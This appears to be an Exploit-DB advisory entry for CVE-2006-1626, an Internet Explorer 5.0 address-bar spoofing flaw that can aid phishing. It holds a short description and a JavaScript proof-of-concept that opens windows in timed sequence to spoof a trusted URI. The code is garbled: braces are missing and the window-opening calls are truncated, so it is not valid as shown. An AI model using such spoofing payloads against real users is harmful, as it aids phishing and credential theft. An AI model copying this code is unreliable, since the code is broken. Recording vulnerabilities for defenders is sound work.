Microsoft Internet Explorer 5.0 Address Bar Spoofing Vulnerability

ID EDB-ID:27577
Type exploitdb
Reporter Hai Nam Luke
Modified 2006-04-03T00:00:00


Microsoft Internet Explorer 5.0 Address Bar Spoofing Vulnerability. CVE-2006-1626. Remote exploit for windows platform


Internet Explorer is prone to address-bar spoofing.

An attacker can exploit this issue to display the URI of a trusted and known site in the address bar, while running an attacker-supplied Macromedia Flash application. This may aid in phishing-style attacks and possibly allow access to properties of the trusted domain.

<script language="javascript">
function pause(ms)
date = new Date();
var curDate = null;

do { var curDate = new Date(); }
while(curDate-date < ms);

function spoof () {
win ='','new')
pause (2000)
win ='','new')
pause (2000)
win ='','new')

<a href="javascript: spoof()">Perform the test</a>